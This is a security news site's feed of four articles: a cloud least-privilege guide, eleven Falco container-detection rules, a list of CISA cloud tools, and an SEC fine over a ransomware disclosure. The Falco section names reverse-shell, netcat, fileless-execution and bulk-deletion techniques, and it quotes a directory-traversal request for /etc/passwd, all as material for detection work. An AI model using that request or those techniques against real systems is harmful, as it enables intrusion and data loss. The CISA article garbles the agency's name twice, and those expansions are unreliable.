Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ Information Security Newspaper|Infosec Articles|Hacking News Thu, 16 May 2024 20:34:00 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.4 https://www.securitynewspaper.com/snews-up/2018/12/news5.png Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ 32 32 How to implement Principle of Least Privilege(Cloud Security) in AWS, Azure, and GCP cloud https://www.securitynewspaper.com/2024/05/16/how-to-implement-principle-of-least-privilegecloud-security-in-aws-azure-and-gcp-cloud/ Thu, 16 May 2024 20:33:58 +0000 https://www.securitynewspaper.com/?p=27458 The Principle of Least Privilege (PoLP) is a foundational concept in cybersecurity, aimed at minimizing the risk of security breaches. By granting users and applications the minimum levels of access—orRead More →

The post How to implement Principle of Least Privilege(Cloud Security) in AWS, Azure, and GCP cloud appeared first on Information Security Newspaper | Hacking News.

]]>
The Principle of Least Privilege (PoLP) is a foundational concept in cybersecurity, aimed at minimizing the risk of security breaches. By granting users and applications the minimum levels of access—or permissions—needed to perform their tasks, organizations can significantly reduce their attack surface. In the context of cloud computing, implementing PoLP is critical. This article explores how to enforce PoLP in the three major cloud platforms(cloud security): Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP).

AWS (Amazon Web Services)

1. Identity and Access Management (IAM)

AWS IAM is the core service for managing permissions. To implement PoLP:

  • Create Fine-Grained Policies: Define granular IAM policies that specify exact actions allowed on specific resources. Use JSON policy documents to customize permissions precisely.
  • Use IAM Roles: Instead of assigning permissions directly to users, create roles with specific permissions and assign these roles to users or services. This reduces the risk of over-permissioning.
  • Adopt IAM Groups: Group users with similar access requirements together. Assign permissions to groups instead of individual users to simplify management.
  • Enable Multi-Factor Authentication (MFA): Require MFA for all users, especially those with elevated privileges, to add an extra layer of security.

2. AWS Organizations and Service Control Policies (SCPs)

  • Centralized Management: Use AWS Organizations to manage multiple AWS accounts. Implement SCPs at the organizational unit (OU) level to enforce PoLP across accounts.
  • Restrict Root Account Usage: Ensure the root account is used sparingly and secure it with strong MFA.

3. AWS Resource Access Manager (RAM)

  • Share Resources Securely: Use RAM to share AWS resources securely across accounts without creating redundant copies, adhering to PoLP.

Azure (Microsoft Azure)

1. Azure Role-Based Access Control (RBAC)

Azure RBAC enables fine-grained access management:

  • Define Custom Roles: Create custom roles tailored to specific job functions, limiting permissions to only what is necessary.
  • Use Built-in Roles: Start with built-in roles which already follow PoLP principles for common scenarios, then customize as needed.
  • Assign Roles at Appropriate Scope: Assign roles at the narrowest scope possible (management group, subscription, resource group, or resource).

2. Azure Active Directory (Azure AD)

  • Conditional Access Policies: Implement conditional access policies to enforce MFA and restrict access based on conditions like user location or device compliance.
  • Privileged Identity Management (PIM): Use PIM to manage, control, and monitor access to important resources within Azure AD, providing just-in-time privileged access.

3. Azure Policy

  • Policy Definitions: Create and assign policies to enforce organizational standards and PoLP. For example, a policy to restrict VM sizes to specific configurations.
  • Initiative Definitions: Group multiple policies into initiatives to ensure comprehensive compliance across resources.

GCP (Google Cloud Platform)

1. Identity and Access Management (IAM)

GCP IAM allows for detailed access control:

  • Custom Roles: Define custom roles to grant only the necessary permissions.
  • Predefined Roles: Use predefined roles which provide granular access and adhere to PoLP.
  • Least Privilege Principle in Service Accounts: Create and use service accounts with specific roles instead of using default or highly privileged accounts.

2. Resource Hierarchy

  • Organization Policies: Use organization policies to enforce constraints on resources across the organization, such as restricting who can create certain resources.
  • Folder and Project Levels: Apply IAM policies at the folder or project level to ensure permissions are inherited appropriately and follow PoLP.

3. Cloud Identity

  • Conditional Access: Implement conditional access using Cloud Identity to enforce MFA and restrict access based on user and device attributes.
  • Context-Aware Access: Use context-aware access to allow access to apps and resources based on a user’s identity and the context of their request.

Implementing Principle of Least Privilege in AWS, Azure, and GCP

As a Cloud Security Analyst, ensuring the Principle of Least Privilege (PoLP) is critical to minimizing security risks. This comprehensive guide will provide detailed steps to implement PoLP in AWS, Azure, and GCP.


AWS

Step 1: Review IAM Policies and Roles

  1. Access the IAM Console:
    • Navigate to the AWS IAM Console.
    • Review existing policies under the “Policies” section.
    • Look for policies with wildcards (*), which grant broad permissions, and replace them with more specific permissions.
  2. Audit IAM Roles:
    • In the IAM Console, go to “Roles.”
    • Check each role’s attached policies. Ensure that each role has the minimum required permissions.
    • Remove or update roles that are overly permissive.

Step 2: Use IAM Access Analyzer

  1. Set Up Access Analyzer:
    • In the IAM Console, select “Access Analyzer.”
    • Create an analyzer and let it run. It will provide findings on resources shared with external entities.
    • Review the findings and take action to refine overly broad permissions.

Step 3: Test Policies with IAM Policy Simulator

  1. Simulate Policies:
    • Go to the IAM Policy Simulator.
    • Simulate the policies attached to your users, groups, and roles to understand what permissions they actually grant.
    • Adjust policies based on the simulation results to ensure they provide only the necessary permissions.

Step 4: Monitor and Audit

  1. Enable AWS CloudTrail:
    • In the AWS Management Console, go to “CloudTrail.”
    • Create a new trail to log API calls across your AWS account.
    • Enable logging and monitor the CloudTrail logs regularly to detect any unauthorized or suspicious activity.
  2. Use AWS Config:
    • Navigate to the AWS Config Console.
    • Set up AWS Config to monitor and evaluate the configurations of your AWS resources.
    • Implement AWS Config Rules to check for compliance with your least privilege policies.

Step 5: Utilize Automated Tools

  1. AWS Trusted Advisor:
    • Access Trusted Advisor from the AWS Management Console.
    • Review the “Security” section for recommendations on IAM security best practices.
  2. AWS Security Hub:
    • Enable Security Hub from the Security Hub Console.
    • Use Security Hub to get a comprehensive view of your security posture, including IAM-related findings.

Azure

Step 1: Review Azure AD Roles and Permissions

  1. Azure AD Roles:
    • Navigate to the Azure Active Directory.
    • Under “Roles and administrators,” review each role and its assignments.
    • Ensure users are assigned only to roles with necessary permissions.
  2. Role-Based Access Control (RBAC):
    • Go to the “Resource groups” or individual resources in the Azure portal.
    • Under “Access control (IAM),” review role assignments.
    • Remove or modify roles that provide excessive permissions.

Step 2: Check Resource-Level Permissions

  1. Review Resource Policies:
    • For each resource (e.g., storage accounts, VMs), review the access policies to ensure they grant only necessary permissions.
  2. Network Security Groups (NSGs):
    • Navigate to “Network security groups” in the Azure portal.
    • Review inbound and outbound rules to ensure they allow only necessary traffic.

Step 3: Monitor and Audit

  1. Azure Activity Logs:
    • Access the Activity Logs.
    • Monitor logs for changes in role assignments and access patterns.
  2. Azure Security Center:
    • Open Azure Security Center.
    • Regularly review security recommendations and alerts, especially those related to IAM.

Step 4: Utilize Automated Tools

  1. Azure Policy:
    • Create and assign policies using the Azure Policy portal.
    • Enforce policies that require the use of least privilege access.
  2. Azure Blueprints:
    • Use Azure Blueprints to define and deploy resource configurations that comply with organizational standards.
  3. Privileged Identity Management (PIM):
    • In Azure AD, go to “Privileged Identity Management” under “Manage.”
    • Enable PIM to manage, control, and monitor privileged access.

GCP

Step 1: Review IAM Policies and Roles

  1. Review IAM Policies:
    • Access the IAM & admin console.
    • Review each policy and role for overly permissive permissions.
    • Avoid using predefined roles with broad permissions; prefer custom roles with specific permissions.
  2. Create Custom Roles:
    • In the IAM console, navigate to “Roles.”
    • Create custom roles that provide the minimum necessary permissions for specific job functions.

Step 2: Check Resource-Based Policies

  1. Service Accounts:
    • In the IAM & admin console, go to “Service accounts.”
    • Review the permissions granted to each service account and ensure they are scoped to the least privilege.
  2. VPC Firewall Rules:
    • Navigate to the VPC network section and select “Firewall rules.”
    • Review and restrict firewall rules to allow only essential traffic.

Step 3: Monitor and Audit

  1. Cloud Audit Logs:
    • Enable and configure Cloud Audit Logs for all services.
    • Regularly review logs to monitor access and detect unusual activities.
  2. IAM Recommender:
    • In the IAM console, use the IAM Recommender to get suggestions for refining IAM policies based on actual usage patterns.
  3. Access Transparency:
    • Enable Access Transparency to get logs of Google Cloud administrator accesses.

Step 4: Utilize Automated Tools

  1. Security Command Center:
    • Access the Security Command Center for a centralized view of your security posture.
    • Use it to monitor and manage security findings and recommendations.
  2. Forseti Security:
    • Deploy Forseti Security for continuous monitoring and auditing of your GCP environment.
  3. Policy Intelligence:
    • Use tools like Policy Troubleshooter to debug access issues and Policy Analyzer to compare policies.

Step 5: Conduct Regular Reviews

  1. Schedule Periodic Reviews:
    • Regularly review IAM roles, policies, and access patterns across your GCP projects.
    • Use the Resource Manager to organize resources and apply IAM policies efficiently.

By following these detailed steps, you can ensure that the Principle of Least Privilege is effectively implemented across AWS, Azure, and GCP, thus maintaining a secure and compliant cloud environment.

Implementing the Principle of Least Privilege in AWS, Azure, and GCP requires a strategic approach to access management. By leveraging the built-in tools and services provided by these cloud platforms, organizations can enhance their security posture, minimize risks, and ensure compliance with security policies. Regular reviews, continuous monitoring, and automation are key to maintaining an effective PoLP strategy in the dynamic cloud environment.

The post How to implement Principle of Least Privilege(Cloud Security) in AWS, Azure, and GCP cloud appeared first on Information Security Newspaper | Hacking News.

]]>
The 11 Essential Falco Cloud Security Rules for Securing Containerized Applications at No Cost https://www.securitynewspaper.com/2024/04/12/the-11-essential-falco-cloud-security-rules-for-securing-containerized-applications-at-no-cost/ Fri, 12 Apr 2024 14:52:00 +0000 https://www.securitynewspaper.com/?p=27438 In the evolving landscape of container orchestration, Kubernetes has emerged as the de facto standard due to its flexibility, scalability, and robust community support. However, as with any complex system,Read More →

The post The 11 Essential Falco Cloud Security Rules for Securing Containerized Applications at No Cost appeared first on Information Security Newspaper | Hacking News.

]]>
In the evolving landscape of container orchestration, Kubernetes has emerged as the de facto standard due to its flexibility, scalability, and robust community support. However, as with any complex system, securing a Kubernetes environment presents unique challenges. Containers, by their very nature, are transient and multi-faceted, making traditional security methods less effective. This is where Falco, an open-source Cloud Native Computing Foundation (CNCF) project, becomes invaluable.

Falco is designed to provide security monitoring and anomaly detection for Kubernetes, enabling teams to detect malicious activity and vulnerabilities in real-time. It operates by intercepting and analyzing system calls to identify unexpected behavior within applications running in containers. As a cloud-native tool, Falco seamlessly integrates into Kubernetes environments, offering deep insights and proactive security measures without the overhead of traditional security tools.

As teams embark on securing their Kubernetes clusters, here are several Falco rules that are recommended to fortify their deployments effectively:

1. Contact K8S API Server From Container

The Falco rule “Contact K8S API Server From Container” is designed to detect attempts to communicate with the Kubernetes (K8s) API Server from a container, particularly by users who are not profiled or expected to do so. This rule is crucial because the Kubernetes API plays a pivotal role in managing the cluster’s lifecycle, and unauthorized access could lead to significant security issues.

Rule Details:

  • Purpose: To audit and flag any unexpected or unauthorized attempts to access the Kubernetes API server from within a container. This might indicate an attempt to exploit the cluster’s control plane or manipulate its configuration.
  • Detection Strategy: The rule monitors network connections made to the API server’s typical ports and checks whether these connections are made by entities (users or processes) that are not explicitly allowed or profiled in the security policy.
  • Workload Applicability: This rule is applicable in environments where containers should not typically need to directly interact with the Kubernetes API server, or where such interactions should be limited to certain profiles.

MITRE ATT&CK Framework Mapping:

  • Tactic: Credential Access, Discovery
  • Technique: T1552.004 (Unsecured Credentials: Kubernetes)

Example Scenario:

Suppose a container unexpectedly initiates a connection to the Kubernetes API server using kubectl or a similar client. This activity could be flagged by the rule if the container and its user are not among those expected or profiled to perform such actions. Monitoring these connections helps in early detection of potential breaches or misuse of the Kubernetes infrastructure.

This rule, by monitoring such critical interactions, helps maintain the security and integrity of Kubernetes environments, ensuring that only authorized and intended communications occur between containers and the Kubernetes API server.

2. Disallowed SSH Connection Non Standard Port

The Falco security rule “Disallowed SSH Connection Non Standard Port” is designed to detect any new outbound SSH connections from a host or container that utilize non-standard ports. This is significant because SSH typically operates on port 22, and connections on other ports might indicate an attempt to evade detection.

Rule Details:

  • Purpose: To monitor and flag SSH connections that are made from non-standard ports, which could be indicative of a security compromise such as a reverse shell or command injection vulnerability being exploited.
  • Detection Strategy: The rule checks for new outbound SSH connections that do not use the standard SSH port. It is particularly focused on detecting reverse shell scenarios where the victim machine connects back to an attacker’s machine, with command and control facilitated through the SSH protocol.
  • Configuration: The rule suggests that users may need to expand the list of monitored ports based on their specific environment’s configuration and potential threat scenarios. This may include adding more non-standard ports or ranges that are relevant to their network setup.

Example Scenario:

An application on a host might be compromised to execute a command that initiates an SSH connection to an external server on a non-standard port, such as 2222 or 8080. This could be part of a command injection attack where the attacker has gained the ability to execute arbitrary commands on the host.

This rule helps in detecting such activities, which are typically red flags for data exfiltration, remote command execution, or establishing a foothold inside the network through unconventional means. By flagging these activities, administrators can investigate and respond to potential security incidents more effectively.

3. Directory Traversal Monitored File Read

The Falco rule “Directory Traversal Monitored File Read” is aimed at detecting and alerting on directory traversal attacks specifically when they involve reading files from critical system directories that are usually accessed via absolute paths. This rule is critical in preventing attackers from exploiting vulnerabilities to access sensitive information outside the intended file directories, such as the web application’s root.

Rule Details:

  • Purpose: To monitor and alert on attempts to read files from sensitive directories like /etc through directory traversal attacks. These attacks exploit vulnerabilities allowing attackers to access files and directories that lie outside the web server’s root directory.
  • Detection Strategy: The rule focuses on detecting read operations on sensitive files that should not be accessed under normal operational circumstances. Access patterns that deviate from the norm (e.g., accessing files through paths that navigate up the directory tree using ../) are flagged.
  • Workload Applicability: This rule is particularly important for environments running web applications where directory traversal vulnerabilities could be exploited.

Example Scenario:

An attacker might exploit a vulnerability in a web application to read the /etc/passwd file by submitting a request like GET /api/files?path=../../../../etc/passwd. This action attempts to break out of the intended directory structure to access sensitive information. The rule would flag such attempts, providing an alert to system administrators.

This rule helps maintain the integrity and security of the application’s file system by ensuring that only legitimate and intended file accesses occur, preventing unauthorized information disclosure through common web vulnerabilities.

4. Netcat Remote Code Execution in Container

The Falco security rule “Netcat Remote Code Execution in Container” is designed to detect instances where the Netcat tool is used within a container environment in a way that could facilitate remote code execution. This is particularly concerning because Netcat is a versatile networking tool that can be used maliciously to establish backdoors and execute commands remotely.

Rule Details:

  • Purpose: To monitor and alert on the use of the Netcat (nc) program within containers, which could indicate an attempt to misuse it for unauthorized remote command execution.
  • Detection Strategy: The rule flags the execution of Netcat inside a container, which is typically unexpected in a controlled environment. This detection focuses on uses of Netcat that might facilitate establishing a remote shell or other command execution pathways from outside the container.
  • Workload Applicability: This rule is important in environments where containers are used to host applications and where there should be strict controls over what executable utilities are allowed.

Example Scenario:

An attacker might exploit a vulnerability within an application running inside a container to download and execute Netcat. Then, they could use it to open a port that listens for incoming connections, allowing the attacker to execute arbitrary commands remotely. This setup could be used for data exfiltration, deploying additional malware, or further network exploitation.

By detecting the use of Netcat in such scenarios, administrators can quickly respond to potential security breaches, mitigating risks associated with unauthorized remote access. This rule helps ensure that containers, which are often part of a larger microservices architecture, do not become points of entry for attackers.

5. Terminal Shell in Container

The Falco security rule “Terminal Shell in Container” is designed to detect instances where a shell is used as the entry or execution point in a container, particularly with an attached terminal. This monitoring is crucial because unexpected terminal access within a container can be a sign of malicious activity, such as an attacker gaining access to run commands or scripts.

Rule Details:

  • Purpose: To monitor for the usage of interactive shells within containers, which could indicate an intrusion or misuse. Terminal shells are typically not used in production containers unless for debugging or administrative purposes, thus their use can be a red flag.
  • Detection Strategy: The rule flags instances where a shell process is initiated with terminal interaction inside a container. It can help in identifying misuse such as an attacker using kubectl exec to run commands inside a container or through other means like SSH.
  • Workload Applicability: This rule is particularly important in environments where containers are expected to run predefined tasks without interactive sessions.

Example Scenario:

An attacker or an unauthorized user gains access to a Kubernetes cluster and uses kubectl exec to start a bash shell in a running container. This action would be flagged by the rule, especially if the shell is initiated with an attached terminal, which is indicative of interactive use.

This rule helps in ensuring that containers, which should typically run without interactive sessions, are not misused for potentially harmful activities. It is a basic auditing tool that can be adapted to include a broader list of recognized processes or conditions under which shells may be legitimately used, thus reducing false positives while maintaining security.

6 .Packet Socket Created in Container

The Falco security rule “Packet Socket Created in Container” is designed to detect the creation of packet sockets at the device driver level (OSI Layer 2) within a container. This type of socket can be used for tasks like ARP spoofing and is also linked to known vulnerabilities that could allow privilege escalation, such as CVE-2020-14386.

Rule Details:

  • Purpose: The primary intent of this rule is to monitor and alert on the creation of packet sockets within containers, a potentially suspicious activity that could be indicative of nefarious activities like network sniffing or ARP spoofing attacks. These attacks can disrupt or intercept network traffic, and the ability to create packet sockets might be used to exploit certain vulnerabilities that lead to escalated privileges within the host system.
  • Detection Strategy: This rule tracks the instantiation of packet sockets, which interact directly with the OSI Layer 2, allowing them to send and receive packets at the network interface controller level. This is typically beyond the need of standard container operations and can suggest a breach or an attempt to exploit.
  • Workload Applicability: It is crucial for environments where containers are part of a secured and controlled network and should not require low-level network access. The creation of such sockets in a standard web application or data processing container is usually out of the ordinary and warrants further investigation.

Example Scenario:

Consider a container that has been compromised through a web application vulnerability allowing an attacker to execute arbitrary commands. The attacker might attempt to create a packet socket to perform ARP spoofing, positioning the compromised container to intercept or manipulate traffic within its connected subnet for data theft or further attacks.

This rule helps in early detection of such attack vectors, initiating alerts that enable system administrators to take swift action, such as isolating the affected container, conducting a forensic analysis to understand the breach’s extent, and reinforcing network security measures to prevent similar incidents.

By implementing this rule, organizations can enhance their monitoring capabilities against sophisticated network-level attacks that misuse containerized environments, ensuring that their infrastructure remains secure against both internal and external threats. This proactive measure is a critical component of a comprehensive security strategy, especially in complex, multi-tenant container orchestration platforms like Kubernetes.

7.Debugfs Launched in Privileged Container

The Falco security rule “Debugfs Launched in Privileged Container” is designed to detect the activation of the debugfs file system debugger within a container that has privileged access. This situation can potentially lead to security breaches, including container escape, because debugfs provides deep access to the Linux kernel’s internal structures.

Rule Details:

  • Purpose: To monitor the use of debugfs within privileged containers, which could expose sensitive kernel data or allow modifications that lead to privilege escalation exploits. The rule targets a specific and dangerous activity that should generally be restricted within production environments.
  • Detection Strategy: This rule flags any instance where debugfs is mounted or used within a container that operates with elevated privileges. Given the powerful nature of debugfs and the elevated container privileges, this combination can be particularly risky.
  • Workload Applicability: This rule is crucial in environments where containers are given privileged access and there is a need to strictly control the tools and commands that can interact with the system’s kernel.

Example Scenario:

Consider a scenario where an operator mistakenly or maliciously enables debugfs within a privileged container. This setup could be exploited by an attacker to manipulate kernel data or escalate their privileges within the host system. For example, they might use debugfs to modify runtime parameters or extract sensitive information directly from kernel memory.

Monitoring for the use of debugfs within privileged containers is a critical security control to prevent such potential exploits. By detecting unauthorized or unexpected use of this powerful tool, system administrators can take immediate action to investigate and remediate the situation, thus maintaining the integrity and security of their containerized environments.

8. Execution from /dev/shm

The Falco security rule “Execution from /dev/shm” is designed to detect executions that occur within the /dev/shm directory. This directory is typically used for shared memory and can be abused by threat actors to execute malicious files or scripts stored in memory, which can be a method to evade traditional file-based detection mechanisms.

Rule Details:

  • Purpose: To monitor and alert on any executable activities within the /dev/shm directory. This directory allows for temporary storage with read, write, and execute permissions, making it a potential target for attackers to exploit by running executable files directly from this shared memory space.
  • Detection Strategy: The rule identifies any process execution that starts from within the /dev/shm directory. This directory is often used by legitimate processes as well, so the rule may need tuning to minimize false positives in environments where such usage is expected.
  • Workload Applicability: This rule is crucial for environments where stringent monitoring of executable actions is necessary, particularly in systems with high-security requirements or where the integrity of the execution environment is critical.

Example Scenario:

An attacker gains access to a system and places a malicious executable in the /dev/shm directory. They then execute this file, which could be a script or a binary, to perform malicious activities such as establishing a backdoor, exfiltrating data, or escalating privileges. Since files in /dev/shm can be executed in memory and may not leave traces on disk, this method is commonly used for evasion.

By detecting executions from /dev/shm, administrators can quickly respond to potential security breaches that utilize this technique, thereby mitigating risks associated with memory-resident malware and other fileless attack methodologies. This monitoring is a proactive measure to enhance the security posture of containerized and non-containerized environments alike.

9. Redirect STDOUT/STDIN to Network Connection in Container

The Falco security rule “Redirect STDOUT/STDIN to Network Connection in Container” is designed to detect instances where the standard output (STDOUT) or standard input (STDIN) of a process is redirected to a network connection within a container. This behavior is commonly associated with reverse shells or remote code execution, where an attacker redirects the output of a shell to a remote location to control a compromised container or host.

Rule Details:

  • Purpose: To monitor and alert on the redirection of STDOUT or STDIN to network connections within containers, which can indicate that a container is being used to establish a reverse shell or execute remote commands—an indicator of a breach or malicious activity.
  • Detection Strategy: This rule specifically detects the use of system calls like dup (and its variants) that are employed to redirect STDOUT or STDIN to network sockets. This activity is often a component of attacks that seek to control a process remotely.
  • Workload Applicability: This rule is particularly important in environments where containers are not expected to initiate outbound connections or manipulate their output streams, which could be indicative of suspicious or unauthorized activities.

Example Scenario:

An attacker exploits a vulnerability within a web application running inside a container and gains shell access. They then execute a command that sets up a reverse shell using Bash, which involves redirecting the shell’s output to a network socket they control. This allows the attacker to execute arbitrary commands on the infected container remotely.

By monitoring for and detecting such redirections, system administrators can quickly identify and respond to potential security incidents that involve stealthy remote access methods. This rule helps to ensure that containers, which are often dynamically managed and scaled, do not become unwitting conduits for data exfiltration or further network penetration.

10. Fileless Execution via memfd_create

The Falco security rule “Fileless Execution via memfd_create” detects when a binary is executed directly from memory using the memfd_create system call. This method is a known defense evasion technique, enabling attackers to execute malware on a machine without storing any payload on disk, thus avoiding typical file-based detection mechanisms.

Rule Details:

  • Purpose: To monitor and alert on the use of the memfd_create technique, which allows processes to create anonymous files in memory that are not linked to the filesystem. This capability can be used by attackers to run malicious code without leaving typical traces on the filesystem.
  • Detection Strategy: This rule triggers when the memfd_create system call is used to execute code, which can be an indicator of an attempt to hide malicious activity. Since memfd_create can also be used for legitimate purposes, the rule may include mechanisms to whitelist known good processes.
  • Workload Applicability: It is critical in environments where integrity and security of the execution environment are paramount, particularly in systems that handle sensitive data or are part of critical infrastructure.

Example Scenario:

An attacker exploits a vulnerability in a web application to gain execution privileges on a host. Instead of writing a malicious executable to disk, they use memfd_create to load and execute the binary directly from memory. This technique helps the attack evade detection from traditional antivirus solutions that monitor file systems for changes.

By detecting executions via memfd_create, system administrators can identify and mitigate these sophisticated attacks that would otherwise leave minimal traces. Implementing such monitoring is essential in high-security environments to catch advanced malware techniques involving fileless execution. This helps maintain the integrity and security of containerized and non-containerized environments alike.

11. Remove Bulk Data from Disk

The Falco security rule “Remove Bulk Data from Disk” is designed to detect activities where large quantities of data are being deleted from a disk, which might indicate an attempt to destroy evidence or interrupt system availability. This action is typically seen in scenarios where an attacker or malicious insider is trying to cover their tracks or during a ransomware attack where data is being wiped.

Rule Details:

  • Purpose: To monitor for commands or processes that are deleting large amounts of data, which could be part of a data destruction strategy or a malicious attempt to impair the integrity or availability of data on a system.
  • Detection Strategy: This rule identifies processes that initiate bulk data deletions, particularly those that might be used in a destructive context. The focus is on detecting commands like rm -rf, shred, or other utilities that are capable of wiping data.
  • Workload Applicability: It is particularly important in environments where data integrity and availability are critical, and where unauthorized data deletion could have severe impacts on business operations or compliance requirements.

Example Scenario:

An attacker gains access to a database server and executes a command to delete logs and other files that could be used to trace their activities. Alternatively, in a ransomware attack, this type of command might be used to delete backups or other important data to leverage the encryption of systems for a ransom demand.

By detecting such bulk deletion activities, system administrators can be alerted to potential breaches or destructive actions in time to intervene and possibly prevent further damage. This rule helps in maintaining the security and operational integrity of environments where data persistence is a critical component.

By implementing these Falco rules, teams can significantly enhance the security posture of their Kubernetes deployments. These rules provide a foundational layer of security by monitoring and alerting on potential threats in real-time, thereby enabling organizations to respond swiftly to mitigate risks. As Kubernetes continues to evolve, so too will the strategies for securing it, making continuous monitoring and adaptation a critical component of any security strategy.

The post The 11 Essential Falco Cloud Security Rules for Securing Containerized Applications at No Cost appeared first on Information Security Newspaper | Hacking News.

]]>
Top 5 free cloud security tools, that can protect your AWS & Azure cloud data from hackers https://www.securitynewspaper.com/2023/07/18/top-5-free-cloud-security-tools-that-can-protect-your-aws-azure-cloud-data-from-hackers/ Tue, 18 Jul 2023 23:07:25 +0000 https://www.securitynewspaper.com/?p=26949 The Cybersecurity and Infrastructure Security Agency (CISA) has come up with a list of free tools that businesses may use to protect themselves in cloud-based settings. According to the articleRead More →

The post Top 5 free cloud security tools, that can protect your AWS & Azure cloud data from hackers appeared first on Information Security Newspaper | Hacking News.

]]>
The Cybersecurity and Infrastructure Security Agency (CISA) has come up with a list of free tools that businesses may use to protect themselves in cloud-based settings. According to the article published by CISA, these tools will assist incident response analysts and network defenders in mitigating, identifying, and detecting threats, known vulnerabilities, and abnormalities that occur in settings that are cloud-based or hybrid.During an attack, threat actors have generally focused their attention on servers located on the premises. However, several threat actors have been drawn in by the fast expansion of cloud migration in order to target cloud systems due to the vast number of attack vectors that are available when it comes to the cloud.

Organizations who do not have the essential capabilities to protect themselves against cloud-based attacks may benefit from the tools that are supplied by CISA. These technologies may assist users in securing their cloud resources from data theft, information exposure, and information theft respectively.
The Cloud Industry Security Alliance (CISA) stated that companies should use the security features supplied by Cloud Service Providers and combine them with the free tools that were recommended by the CISA in order to defend themselves from these attacks. The following is a list of the tools that the CISA provides:

  1. Cybersecurity Evaluation Tool (CSET).
  2. The SCuBAGear tool.
  3. The Untitled Goose Tool
  4. Decider Tool
  5. Memory Forensic on Cloud (JPCERT/CC) is an offering of Japan CERT.

The Cybersecurity Evaluation Tool, also known as the CSET.


For the purpose of assisting enterprises in the assessment of their cybersecurity posture, the CISA created this tool, which makes use of standards, guidelines, and recommendations that are widely accepted in the industry. Multiple questions about operational rules and procedures, as well as queries on the design of the system, are asked by the tool.This information is then utilized to develop a report that gives a comprehensive insight into the strengths and shortcomings of the businesses, along with suggestions to remedy them. The Cross-Sector Cyber Performance Goals (CPG) are included in the CSET version 11.5. These goals were established by the National Institute of Standards and Technology (NIST) in collaboration with the Computer Security Industry Association (CISA).

The CPG is able to give best practices and guidelines that should be followed by all organizations. This tool may assist in the fight against prevalent and significant TTPs.

M365 Secure Configuration Baseline Assessment Tool, SCuBAGear


SCuBAGear is a tool that was developed as a part of the SCuBA (Secure Cloud Business Applications) project. This project was started as a direct reaction to the Supply Chain hack that occurred with SolarWinds Orion Software. SCuBA is a piece of automated software that does comparisons between the Federal Civilian Executive Branch (FECB) and the M365 Secure configurations of the CISA. CISA, in conjunction with SCuBAGear, has produced a number of materials that may serve as a guide for cloud security and are of use to all types of enterprises. This tool resulted in the creation of three different documents:

SCuBA Technical Reference Architecture (TRA) — Offers fundamental building blocks for bolstering the safety of cloud storage environments. Cloud-based business apps (for SaaS models) and the security services that are used to safeguard and monitor them are both included in the purview of TRA.
The Hybrid Identity Solutions Architecture provides the best possible methods for tackling identity management in an environment that is hosted on the cloud.
M365 security configuration baseline (SCB) — offers fundamental security settings for Microsoft Defender 365, OneDrive, Azure Active Directory, Exchange Online, and other services.This application generates an HTML report that details policy deviations outlined in the M365 SCB guidelines and presents them.

Untitled Goose Tool


The tool, which was created in collaboration with Sandia National Laboratories, is designed to assist network defenders in locating harmful behaviors in Microsoft Azure, Active Directory, and Microsoft 365. Additionally, it enables the querying, exporting, and investigating of audit logs.Organizations who do not import these sorts of logs into their Security Incident and Event Management (SIEM) platform will find this application to be quite helpful. It was designed as an alternative to the PowerShell tools that were available at the time since those tools lacked the capability to gather data for Azure, AAD, and M365.

This is a tool that Network Defenders may use to,

Extraction of cloud artifacts from Active Directory, Microsoft Azure, and Microsoft 365
The Unified Audit Logs (UAL) should have time bounding performed on them.
Collect data making use of the time-bounding feature of the MDE (Microsoft Defender Endpoint) data Decider Tool.
Incident response analysts may find it useful to map malicious actions using this tool in conjunction with the MITRE ATT&CK methodology. In addition to this, it makes their methods more accessible and offers direction for laying out their actions in the appropriate manner.

Decider Tool

This tool, much like the CSET, asks a number of questions in order to give relevant user inquiries for the purpose of selecting the most effective identification technique. Users now have the ability to, given all of this information:

Export heatmaps from the ATT&CK Navigator.
Publish reports on the threat intelligence you have collected.
Determine and put into effect the appropriate preventative measures.
Prevent Exploitation
In addition, the CISA has given a link that describes how to use the Decider tool.

Memory Forensic on Cloud (JPCERT/CC)


It was built for constructing and analyzing the Windows Memory Image on AWS using Volatility 3, which was the reason why it was developed. In addition, Memory Forensics is necessary when it comes to the recently popular LOTL (Living-Off-the-Land) attacks, which are also known as fileless malware. 
Memory image analysis may be helpful during incident response engagements, which often call for the use of high-specification equipment, a significant amount of time, and other resources in order to adequately prepare the environment.

The post Top 5 free cloud security tools, that can protect your AWS & Azure cloud data from hackers appeared first on Information Security Newspaper | Hacking News.

]]>
Blackbaud, a cloud software provider, fined $3 million for failing to notify customers of a ransomware attack https://www.securitynewspaper.com/2023/03/10/blackbaud-a-cloud-software-provider-fined-3-million-for-failing-to-notify-customers-of-a-ransomware-attack/ Fri, 10 Mar 2023 22:28:17 +0000 https://www.securitynewspaper.com/?p=26418 The U.S. Securities and Exchange Commission (SEC) made the announcement today that Blackbaud Inc., a public company located in South Carolina that offers donor data management software to non-profit organizations,Read More →

The post Blackbaud, a cloud software provider, fined $3 million for failing to notify customers of a ransomware attack appeared first on Information Security Newspaper | Hacking News.

]]>
The U.S. Securities and Exchange Commission (SEC) made the announcement today that Blackbaud Inc., a public company located in South Carolina that offers donor data management software to non-profit organizations, has agreed to pay $3 million to resolve charges for providing deceptive statements about a ransomware attack in 2020 that affected more than 13,000 clients. The SEC alleges that Blackbaud made the disclosures in an attempt to deceive investors about the severity of the attack.

According to the order issued by the SEC, Blackbaud made the announcement on July 16, 2020, that the ransomware attacker did not access the personal information of donors, including their bank account information or social security numbers. But, within a few days of these claims being made, the company’s IT and customer relations workers realized that the attacker had, in fact, accessed and removed this sensitive material from the system. Due to the fact that the corporation did not properly maintain its disclosure controls and processes, the workers in question did not share this information with the senior management that was responsible for its dissemination to the public. As a result of this mistake, the corporation submitted a quarterly report to the SEC in August 2020 that left out this vital information regarding the breadth of the attack and misrepresented the danger that an attacker may access such sensitive donor information as being hypothetical.

According to the quarterly report that was filed with the SEC in 2020 for the three months leading up to November 2020, Blackbaud had already been sued in 23 proposed consumer class action cases in the United States and Canada related to the ransomware attack and data breach that had occurred in May 2020.

The business also disclosed that government agencies and data regulators have also conducted investigations into the incident. These investigations include a multi-state, combined Civil Investigative Demand filed on behalf of 43 state Attorneys General and the District of Columbia.

